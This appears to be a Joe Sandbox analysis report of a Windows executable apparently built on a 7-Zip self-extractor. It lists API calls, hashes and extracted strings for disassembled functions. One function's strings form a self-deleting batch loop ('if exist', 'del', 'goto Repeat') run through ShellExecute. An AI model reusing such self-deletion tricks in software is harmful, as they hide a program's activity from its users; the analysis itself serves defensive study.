                                                              • Part of subcall function 004034A5: MulDiv.KERNEL32(?,00000003,00000002), ref: 00403510
                                                              • Part of subcall function 004034A5: MulDiv.KERNEL32(?,00000003,00000002), ref: 0040351E
                                                              • Part of subcall function 004034A5: CreateCompatibleDC.GDI32(00000000), ref: 0040352D
                                                              • Part of subcall function 004034A5: CreateCompatibleDC.GDI32(?), ref: 00403537
                                                              • Part of subcall function 004034A5: SelectObject.GDI32(00000000,?), ref: 00403546
                                                              • Part of subcall function 004034A5: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 00403551
                                                              • Part of subcall function 004034A5: SelectObject.GDI32(?,00000000), ref: 0040355B
                                                              • Part of subcall function 004034A5: SetStretchBltMode.GDI32(?,00000004), ref: 00403564
                                                              • Part of subcall function 004034A5: StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 00403586
                                                              • Part of subcall function 004034A5: GetCurrentObject.GDI32(?,00000007), ref: 0040358F
                                                              • Part of subcall function 004034A5: SelectObject.GDI32(?,00000000), ref: 004035A1
                                                              • Part of subcall function 004034A5: SelectObject.GDI32(?,00000000), ref: 004035A7
                                                              • Part of subcall function 004034A5: DeleteDC.GDI32(?), ref: 004035B2
                                                              • Part of subcall function 004034A5: DeleteDC.GDI32(?), ref: 004035B7
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0040571B
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 0040572D
                                                            • SendMessageW.USER32(?,00000172,00000000,?), ref: 0040573D
                                                            • GlobalFree.KERNEL32(00000000), ref: 00405752
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureSendSizeofStreamlstrcmpi
                                                            • String ID: IMAGES$STATIC
                                                            • API String ID: 3592854226-1168396491
                                                            • Opcode ID: 879934391142338f4c0ae6713a3d598d47aba0d21ac4b5037d1314ce2996c6d0
                                                            • Instruction ID: 5b24117ceed79abb5443b993532156610a81d6d7970d1e29ea56a9cef343aa67
                                                            • Opcode Fuzzy Hash: 879934391142338f4c0ae6713a3d598d47aba0d21ac4b5037d1314ce2996c6d0
                                                            • Instruction Fuzzy Hash: 07411A71A00208FFDB11ABA0DC88EAF77BCEF49705F51407AF601A6190D7799E46DB29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,000004B3), ref: 00409036
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0040903F
                                                            • GetDlgItem.USER32(?,000004B4), ref: 00409082
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0040908B
                                                            • GetSystemMetrics.USER32(00000010), ref: 00409114
                                                            • GetSystemMetrics.USER32(00000011), ref: 0040911A
                                                            • GetSystemMetrics.USER32(00000008), ref: 00409120
                                                            • GetSystemMetrics.USER32(00000007), ref: 0040912B
                                                            • GetParent.USER32(?), ref: 00409150
                                                            • GetClientRect.USER32(00000000,?), ref: 00409161
                                                            • ClientToScreen.USER32(00000000,?), ref: 00409172
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004091D8
                                                            • GetClientRect.USER32(?,?), ref: 00409262
                                                              • Part of subcall function 004097BC: GetDlgItem.USER32(?,00000020), ref: 004097DA
                                                              • Part of subcall function 004097BC: SetWindowPos.USER32(00000000,?,00409511,?,?,?,?,?,00000000,?,?,75C08FB0,?,?,?,00000020), ref: 004097E1
                                                            • ClientToScreen.USER32(00000000,?), ref: 00409179
                                                              • Part of subcall function 0040843F: GetDlgItem.USER32(?,?), ref: 0040844B
                                                            • GetSystemMetrics.USER32(00000008), ref: 004092EF
                                                            • GetSystemMetrics.USER32(00000007), ref: 004092F6
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                            • String ID:
                                                            • API String ID: 747815384-0
                                                            • Opcode ID: 6010b5586e3160ba8506d96e14723b5042423bcce0cb31885f0b4684bd6ec028
                                                            • Instruction ID: c632412a5a33fa474f1902e8d818173d360f4408f818f46c608f4226bc3f0ad5
                                                            • Opcode Fuzzy Hash: 6010b5586e3160ba8506d96e14723b5042423bcce0cb31885f0b4684bd6ec028
                                                            • Instruction Fuzzy Hash: 61A17471E00215AFDF10CFA9CD85AAEBBB9EF88710F194169E900F7285D774ED018BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDriveTypeW.KERNEL32(?), ref: 00405AC1
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00405AF4
                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405BA6
                                                            • CloseHandle.KERNEL32(00000000), ref: 00405BB8
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BCE
                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00405BE0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                            • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                            • API String ID: 3376544914-3467708659
                                                            • Opcode ID: e87a570bc3bc16d1c606f5509409edd029b9275b928d07d20fb1c4806b1bf4d9
                                                            • Instruction ID: 92ed7352b11ff46a90e83ca7b99ef020e3a2c8ebe3b5ebfa04c81b2b9a9db43e
                                                            • Opcode Fuzzy Hash: e87a570bc3bc16d1c606f5509409edd029b9275b928d07d20fb1c4806b1bf4d9
                                                            • Instruction Fuzzy Hash: 3C416472900119AECB14EFA1DD86DEF7B78EF04314F50406AF601B61E1DB746E85DBA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 00420709
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 004202BE
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 004202D0
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 004202E2
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 004202F4
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 00420306
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 00420318
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 0042032A
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 0042033C
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 0042034E
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 00420360
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 00420372
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 00420384
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 00420396
                                                            • _free.LIBCMT ref: 004206FE
                                                              • Part of subcall function 0041D8BA: HeapFree.KERNEL32(00000000,00000000,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?), ref: 0041D8D0
                                                              • Part of subcall function 0041D8BA: GetLastError.KERNEL32(?,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?,?), ref: 0041D8E2
                                                            • _free.LIBCMT ref: 00420720
                                                            • _free.LIBCMT ref: 00420735
                                                            • _free.LIBCMT ref: 00420740
                                                            • _free.LIBCMT ref: 00420762
                                                            • _free.LIBCMT ref: 00420775
                                                            • _free.LIBCMT ref: 00420783
                                                            • _free.LIBCMT ref: 0042078E
                                                            • _free.LIBCMT ref: 004207C6
                                                            • _free.LIBCMT ref: 004207CD
                                                            • _free.LIBCMT ref: 004207EA
                                                            • _free.LIBCMT ref: 00420802
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: 1e5723d25d53dd34ca643d94fd98a225f049ee2017e098510fc2e6e4f07d8627
                                                            • Instruction ID: f0e553c9e8343717a0a7b969cb5d34bc98da930babeb4e51af295b5064f8747a
                                                            • Opcode Fuzzy Hash: 1e5723d25d53dd34ca643d94fd98a225f049ee2017e098510fc2e6e4f07d8627
                                                            • Instruction Fuzzy Hash: BF313C71A002149FEB21AB39E845B97B3E9BF40315F50442BE459D6292DBBDBC80CB1C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free$___from_strstr_to_strchr
                                                            • String ID: (3k
                                                            • API String ID: 3409252457-3876852650
                                                            • Opcode ID: c7a94b45f35301d2f4b497baa772962acfc0f97d7eb98f0e9f5df19cec1c5ace
                                                            • Instruction ID: fdbf306c64a7c8e7d47248ea4e3c8a392b46f6218617ea4e7a9b4b0eb2763b88
                                                            • Opcode Fuzzy Hash: c7a94b45f35301d2f4b497baa772962acfc0f97d7eb98f0e9f5df19cec1c5ace
                                                            • Instruction Fuzzy Hash: 08513AB1E04201AFDB10AF65C851AEE7BA4EF01354F10417FE81497281EB7D95CAC79D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetParent.USER32(?), ref: 00407DA8
                                                            • GetWindowLongW.USER32(00000000), ref: 00407DAF
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00407DC6
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 00407DEB
                                                            • GetSystemMetrics.USER32(00000031), ref: 00407DFC
                                                            • GetSystemMetrics.USER32(00000032), ref: 00407E03
                                                            • GetWindowDC.USER32(?), ref: 00407E14
                                                            • GetWindowRect.USER32(?,?), ref: 00407E21
                                                            • DrawIconEx.USER32(00000000,?,?,?,?,?,?,?,00000003), ref: 00407E56
                                                            • ReleaseDC.USER32(?,00000000), ref: 00407E5E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                            • String ID:
                                                            • API String ID: 2586545124-0
                                                            • Opcode ID: 13315dc566440e7873623460b0985ad812db8e2c3297466bf6bad93b447df2c8
                                                            • Instruction ID: 32c8ee591f6a75049be7983eb7663823e757bc500077958c5c7cf1faa07ade31
                                                            • Opcode Fuzzy Hash: 13315dc566440e7873623460b0985ad812db8e2c3297466bf6bad93b447df2c8
                                                            • Instruction Fuzzy Hash: EA313876A00209BFCB11DFA8DD88DAF7BB9FB48750F414165F901A62A0C734EE11DB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00408CE3: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408D46
                                                              • Part of subcall function 00408CE3: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408D62
                                                              • Part of subcall function 00408CE3: GetDlgItem.USER32(?,000004B7), ref: 00408D75
                                                              • Part of subcall function 00408CE3: SetWindowLongW.USER32(00000000,000000FC,Function_00007D9B), ref: 00408D83
                                                              • Part of subcall function 00409D11: GetDlgItem.USER32(?,?), ref: 00409D20
                                                              • Part of subcall function 00409D11: ShowWindow.USER32(00000000,?,?,00408A44,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409D38
                                                              • Part of subcall function 0040843F: GetDlgItem.USER32(?,?), ref: 0040844B
                                                            • GetDlgItem.USER32(?,000004B6), ref: 00408E10
                                                            • DestroyWindow.USER32(00000000), ref: 00408E13
                                                            • CreateWindowExA.USER32(00000200,Edit,004278FE,500100A0,?,?,?,?,?,000004B6,00000000,00000000), ref: 00408E4D
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00408E60
                                                            • GetDlgItem.USER32(?,000004B6), ref: 00408E6F
                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00408E77
                                                            • GetDlgItem.USER32(?,000004B6), ref: 00408E84
                                                            • SetFocus.USER32(00000000), ref: 00408E87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystem
                                                            • String ID: Edit
                                                            • API String ID: 2563414232-554135844
                                                            • Opcode ID: 3ca9707fea54dbec7de80c806e1157ff2d61b2f5687ea0a5ee209b53e799012e
                                                            • Instruction ID: 6d633ca7e672683e2539274c03935dd34f52b8824e58e3a08f9cf6f2533a953c
                                                            • Opcode Fuzzy Hash: 3ca9707fea54dbec7de80c806e1157ff2d61b2f5687ea0a5ee209b53e799012e
                                                            • Instruction Fuzzy Hash: 73218471A00208BFDB11DBA5CD89EAFBBBDEF88B40F414029F604B3191CB749D008B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00408775: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00408798
                                                              • Part of subcall function 00408775: LoadIconW.USER32(00000000), ref: 0040879F
                                                              • Part of subcall function 00408775: GetSystemMetrics.USER32(00000032), ref: 004087B1
                                                              • Part of subcall function 00408775: GetSystemMetrics.USER32(00000031), ref: 004087B6
                                                              • Part of subcall function 00408775: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 004087BF
                                                              • Part of subcall function 00408775: LoadImageW.USER32(00000000), ref: 004087C6
                                                              • Part of subcall function 00408775: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004087E4
                                                              • Part of subcall function 00408775: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004087F1
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 0040880D
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 00408819
                                                              • Part of subcall function 00408775: GetWindowLongW.USER32(00000000,000000F0), ref: 00408820
                                                              • Part of subcall function 00408775: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408835
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B5), ref: 00408842
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B5), ref: 00408852
                                                              • Part of subcall function 00408775: GetWindowLongW.USER32(00000000,000000F0), ref: 0040885D
                                                              • Part of subcall function 00408775: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040886C
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 00408882
                                                              • Part of subcall function 00409D11: GetDlgItem.USER32(?,?), ref: 00409D20
                                                              • Part of subcall function 00409D11: ShowWindow.USER32(00000000,?,?,00408A44,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409D38
                                                              • Part of subcall function 0040843F: GetDlgItem.USER32(?,?), ref: 0040844B
                                                            • ClientToScreen.USER32(?,?), ref: 00408EE6
                                                            • GetWindowRect.USER32(?,?), ref: 00408EF9
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00408F11
                                                            • SetWindowLongW.USER32(?,000000F0,00800000), ref: 00408F27
                                                            • SetWindowLongW.USER32(?,000000EC,00000008), ref: 00408F30
                                                            • GetWindowRect.USER32(?,?), ref: 00408F39
                                                              • Part of subcall function 004097BC: GetDlgItem.USER32(?,00000020), ref: 004097DA
                                                              • Part of subcall function 004097BC: SetWindowPos.USER32(00000000,?,00409511,?,?,?,?,?,00000000,?,?,75C08FB0,?,?,?,00000020), ref: 004097E1
                                                            • GetDlgItem.USER32(?,000004B2), ref: 00408F66
                                                            • GetDlgItem.USER32(?,000004B2), ref: 00408F75
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00408F7C
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408F8B
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$Long$HandleLoadMessageMetricsModuleRectSendSystem$ClientIconImageScreenShow
                                                            • String ID:
                                                            • API String ID: 1121484998-0
                                                            • Opcode ID: 1cdce4adc764c7f088d0ee6d730f600d7813845618ebbd284a670f2826c691e1
                                                            • Instruction ID: 9e74c93de23cf570c17e1b5a08439b3f17f75c0aa34f920750d64279ea0233c6
                                                            • Opcode Fuzzy Hash: 1cdce4adc764c7f088d0ee6d730f600d7813845618ebbd284a670f2826c691e1
                                                            • Instruction Fuzzy Hash: CB311EB1A00119BFDB11DBA9CD85EAEBBB9FF48310F144125F914F3291CB74AD118BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _free.LIBCMT ref: 0041D34F
                                                              • Part of subcall function 0041D8BA: HeapFree.KERNEL32(00000000,00000000,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?), ref: 0041D8D0
                                                              • Part of subcall function 0041D8BA: GetLastError.KERNEL32(?,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?,?), ref: 0041D8E2
                                                            • _free.LIBCMT ref: 0041D35B
                                                            • _free.LIBCMT ref: 0041D366
                                                            • _free.LIBCMT ref: 0041D371
                                                            • _free.LIBCMT ref: 0041D37C
                                                            • _free.LIBCMT ref: 0041D387
                                                            • _free.LIBCMT ref: 0041D392
                                                            • _free.LIBCMT ref: 0041D39D
                                                            • _free.LIBCMT ref: 0041D3A8
                                                            • _free.LIBCMT ref: 0041D3B6
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 159f680e33d9f79aaa113224bbcf6e0f3923927abfab0cce4d6b2ef038fb45ee
                                                            • Instruction ID: e367185f230cf175e0bcaf7a2e1da13122720bedc4ffbe012fdc2dba95469968
                                                            • Opcode Fuzzy Hash: 159f680e33d9f79aaa113224bbcf6e0f3923927abfab0cce4d6b2ef038fb45ee
                                                            • Instruction Fuzzy Hash: 0621A7B6D00108AFDB01EF95C891DDEBBB9FF08345F0081AAF5159B221DB75DA95CB88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(006C2BF0), ref: 0040199A
                                                              • Part of subcall function 00404995: lstrlenW.KERNEL32(?,006C2BF2,00000000,?,00401A2E,006C2BF2,004269A0), ref: 0040499D
                                                              • Part of subcall function 00404995: lstrlenW.KERNEL32(?,?,00401A2E,006C2BF2,004269A0), ref: 004049A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: BeginPromptTimeout$GUIFlags$GUIMode$MiscFlags$OverwriteMode$SelfDelete$SfxVarCmdLine1$bpt
                                                            • API String ID: 1659193697-507222989
                                                            • Opcode ID: 453c9c42458ea379abe1aae73ddc729c49ca3f67f324b9ee7c8da57b890cf8da
                                                            • Instruction ID: b7f53674935df98c98da0a44345d7be46f2990e0f6702e27673392295db007e3
                                                            • Opcode Fuzzy Hash: 453c9c42458ea379abe1aae73ddc729c49ca3f67f324b9ee7c8da57b890cf8da
                                                            • Instruction Fuzzy Hash: A0A15772604215A9DB24EBA5E852AFF73B8AB50714FA0403FF041B61F0EB7D9D82D21D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wvsprintfW.USER32(?,00000000,?), ref: 00409B21
                                                            • GetLastError.KERNEL32(?,0000FDE9,00000000), ref: 00409B31
                                                            • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409B59
                                                            • FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409B70
                                                            • lstrlenW.KERNEL32(?,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409B83
                                                            • lstrlenW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409B8A
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00409BB6
                                                            • lstrcpyW.KERNEL32(00000002,00000000), ref: 00409BC9
                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409BDC
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FormatMessagelstrcpylstrlen$ErrorFreeLastLocalwvsprintf
                                                            • String ID:
                                                            • API String ID: 4146474141-0
                                                            • Opcode ID: 2315ee4240eef3a5fd566099b7850d6959c3581f514a6eb0293e743c75f1db6f
                                                            • Instruction ID: 26fe321a3274603042a3941b15e792db46d0e5a95a6efab40b32ee501e362044
                                                            • Opcode Fuzzy Hash: 2315ee4240eef3a5fd566099b7850d6959c3581f514a6eb0293e743c75f1db6f
                                                            • Instruction Fuzzy Hash: 7C2184B2500108BEDB15DF65DC89DEB3B6CEB04394F10407BF505961A0EA74AE45CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetDlgItem.USER32(?,000004B3), ref: 004096FA
                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040970C
                                                            • GetDlgItem.USER32(?,000004B4), ref: 00409716
                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00409722
                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00409731
                                                            • GetDlgItem.USER32(?,?), ref: 00409739
                                                            • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00409745
                                                            • GetDlgItem.USER32(?,?), ref: 0040974D
                                                            • SetFocus.USER32(00000000,?,?,004088F9,000004B4,000004B3,00000000,000004B4,00000000,?,00000000), ref: 00409750
                                                            Similarity
                                                            • API ID: ItemMessageSend$Focus
                                                            • String ID:
                                                            • API String ID: 3946207451-0
                                                            • Opcode ID: c0990d19b43208d4d8c318df05fad4ee7bc9c2afa75e2af5abce2a1fe7552fd6
                                                            • Instruction ID: 7289477ae7c8e59e64be21adb5cea8fd92b758f8a7879ccb231af20fb948f028
                                                            • Opcode Fuzzy Hash: c0990d19b43208d4d8c318df05fad4ee7bc9c2afa75e2af5abce2a1fe7552fd6
                                                            • Instruction Fuzzy Hash: ABF0E171780318BAEF312B52DD4AF867E1ADB44B50F058061BB086E0E1CAF6D450DE64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 0041949B
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 004194A3
                                                            • _ValidateLocalCookies.LIBCMT ref: 00419531
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0041955C
                                                            • _ValidateLocalCookies.LIBCMT ref: 004195B1
